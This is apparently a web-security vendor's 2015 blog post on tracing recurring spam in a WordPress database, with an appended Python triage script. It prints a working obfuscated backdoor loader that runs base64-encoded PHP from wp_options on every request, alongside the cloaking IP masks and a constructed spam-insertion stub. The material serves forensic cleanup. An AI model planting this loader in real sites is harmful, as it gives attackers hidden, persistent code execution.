Wednesday, May 27, 2015

Identifying and Removing Spam From a WordPress Database

Background

This WordPress spam clean-up case did not stand out at first glance. The customer had been blacklisted by Google because of spam posts. As part of our blacklist removal service we reviewed the Google alert and started working. An internal malware scan with Quttera tools quickly identified and verified the infection and its type. However, the spam posts kept reappearing after each successful clean-up. This post is a short overview of the spam removal process, to give you hints when you search for the origin of spam on your own websites.

Malware Scan and Investigation

As there were no suspicious posts in the WordPress dashboard, we started by investigating the contents of the MySQL database tables. The spam posts were found in the database and removed. In no time, new posts with different spam content were added. Next we checked the cache plugins that were installed and removed them to reduce the "investigation noise". After that we dumped the contents of the wp_options table and examined it. During this investigation we found two malicious WordPress options, wpdcon and wptheme_opt.

wpdcon contained a list of suspicious IP masks, each encoded with base64:

NS4yNTUuMTkyLjAtMTg=
OC4qLiouKg==
MTIuMC4qLio=

For the full body see here - http://pastebin.com/uYzXu1B3

Decoded, the three entries above read 5.255.192.0-18, 8.*.*.* and 12.0.*.*. These masks are compared against the requesting IP address to recognize whether a request came from a human visitor.

wptheme_opt (http://pastebin.com/cdFLyL9X) contained the actual body that loaded the spam posts into the database.

When these two options were removed from the database, the code that still referenced them started to generate errors on every access to the website. Investigating those errors pointed to the exact injection place.

The following is a dump of the injected code. It reads the wptheme_opt option from wp_options, unserializes it into an array of base64 strings, decodes and joins them into PHP source, and registers that source as an anonymous function on the WordPress init hook, so the stored payload runs on every request. Deleting the spam posts alone could never help while this loader stayed in place:

{{{{

// get_option("wptheme_opt")  -> serialized array of base64 strings stored in wp_options
// unserialize / array_map    -> turn every element back into a line of PHP source
// implode("\n", ...)         -> join the lines; create_function('', ...) compiles them
// add_action('init', ...)    -> run the compiled function on every WordPress request
add_action('init', create_function('', implode("\n", array_map("base64_decode", unserialize(get_option("wptheme_opt"))))));

}}}}
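The following script is an added example, not part of the original post and not Quttera's tooling. It automates the two checks described above for an offline wp_options dump: it decodes serialized arrays of base64 strings and labels each element as an IP mask (the wpdcon shape) or as PHP source (the wptheme_opt shape), and it searches PHP files for the add_action('init', create_function(... get_option(...))) loader so the option name and the injection point are found together. The three masks are the ones shown above; the loader body, the blogname row, the functions.php snippet and the is_crawler/$spam_post names inside it are constructed for the example.

```python
# Added example (not Quttera's tooling): offline triage of a wp_options dump.
from __future__ import annotations
import base64
import re

# Subset of PHP serialize() output used here: a:N:{i:0;s:len:"...";i:1;...}
_ARRAY_HEAD = re.compile(rb'a:(\d+):\{')
_STRING_ITEM = re.compile(rb'i:\d+;s:(\d+):"')

def php_unserialize_string_array(blob: bytes) -> list[bytes]:
    """Return the elements of a serialized PHP array of strings (ValueError otherwise)."""
    head = _ARRAY_HEAD.match(blob)
    if not head:
        raise ValueError("not a serialized PHP array")
    items, pos = [], head.end()
    for _ in range(int(head.group(1))):
        item = _STRING_ITEM.match(blob, pos)
        if not item:
            raise ValueError("unsupported element at offset %d" % pos)
        start = item.end()
        end = start + int(item.group(1))      # s:len is a byte length, so slice bytes
        if blob[end:end + 2] != b'";':
            raise ValueError("bad string terminator at offset %d" % end)
        items.append(blob[start:end])
        pos = end + 2
    if blob[pos:pos + 1] != b'}':
        raise ValueError("missing array terminator")
    return items

def php_serialize_string_array(items: list[bytes]) -> bytes:
    """Inverse of the above; used here only to build the constructed sample rows."""
    body = b''.join(b'i:%d;s:%d:"%s";' % (i, len(s), s) for i, s in enumerate(items))
    return b'a:%d:{%s}' % (len(items), body)

# Dotted quad with optional '*' octets and an optional trailing '-N': the shape of
# the decoded wpdcon entries (5.255.192.0-18, 8.*.*.*, 12.0.*.*).
_IP_MASK = re.compile(r'^\d{1,3}(?:\.(?:\d{1,3}|\*)){3}(?:-\d{1,2})?$')
# Tokens that mark decoded text as PHP source a human should read.
_PHP_MARKERS = (b'<?php', b'add_action', b'wp_insert_post', b'base64_decode',
                b'eval(', b'create_function', b'$_SERVER', b'$_POST', b'$_GET')

def classify(decoded: bytes) -> str:
    text = decoded.decode('utf-8', 'replace').strip()
    if _IP_MASK.match(text):
        return 'ip-mask'
    if any(marker in decoded for marker in _PHP_MARKERS):
        return 'php-code'
    return 'other'

def triage_option(value: bytes) -> list[tuple[str, str]]:
    """Decode every base64 element of one serialized array and label it."""
    findings = []
    for item in php_unserialize_string_array(value):
        try:
            decoded = base64.b64decode(item, validate=True)
        except ValueError:                        # binascii.Error is a ValueError
            findings.append(('not-base64', item.decode('latin-1')))
            continue
        findings.append((classify(decoded), decoded.decode('utf-8', 'replace')))
    return findings

def triage_wp_options(rows: dict[str, bytes]) -> dict[str, list[tuple[str, str]]]:
    """Report only options whose array elements decode to IP masks or PHP code."""
    report = {}
    for name, value in rows.items():
        if not value.startswith(b'a:'):
            continue                              # scalar options are not this pattern
        try:
            findings = triage_option(value)
        except ValueError:
            continue                              # nested or mixed arrays: out of scope
        if any(kind in ('ip-mask', 'php-code') for kind, _ in findings):
            report[name] = findings
    return report

# The loader quoted in the post: which option name is fed into create_function() on init.
_OPTION_LOADER = re.compile(
    r"add_action\(\s*['\"]init['\"]\s*,\s*create_function\(.*?"
    r"get_option\(\s*['\"]([A-Za-z0-9_]+)['\"]", re.S)

def find_option_loaders(php_source: str) -> list[str]:
    return _OPTION_LOADER.findall(php_source)

# Constructed sample data: the three masks from the post, a constructed stand-in for
# the loader body, one ordinary option, and a functions.php carrying the injected line.
SAMPLE_WP_OPTIONS = {
    'wpdcon': php_serialize_string_array(
        [b'NS4yNTUuMTkyLjAtMTg=', b'OC4qLiouKg==', b'MTIuMC4qLio=']),
    'wptheme_opt': php_serialize_string_array([
        base64.b64encode(b'$ip = $_SERVER["REMOTE_ADDR"];'),
        base64.b64encode(b'if (is_crawler($ip)) { wp_insert_post($spam_post); }'),
    ]),
    'blogname': b's:13:"Example Store";',
}
SAMPLE_FUNCTIONS_PHP = r'''<?php
add_action('init', create_function('', implode("\n", array_map("base64_decode", unserialize(get_option("wptheme_opt"))))));
'''

if __name__ == '__main__':
    for name, findings in triage_wp_options(SAMPLE_WP_OPTIONS).items():
        print(name, findings)
    print('loader options referenced:', find_option_loaders(SAMPLE_FUNCTIONS_PHP))
```

On a real case, feed triage_wp_options() the option_name/option_value columns of a wp_options dump and run find_option_loaders() over every PHP file under the site root; an option name that appears in both results is the pair to remove together. Deleting only the option, as the post shows, leaves the hook in place and turns the site into an error page, so remove the injected line first and the option second.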

Resolution

After the clean-up, a reconsideration request was submitted to Google as part of our anti-malware services for websites, and Google removed the alert.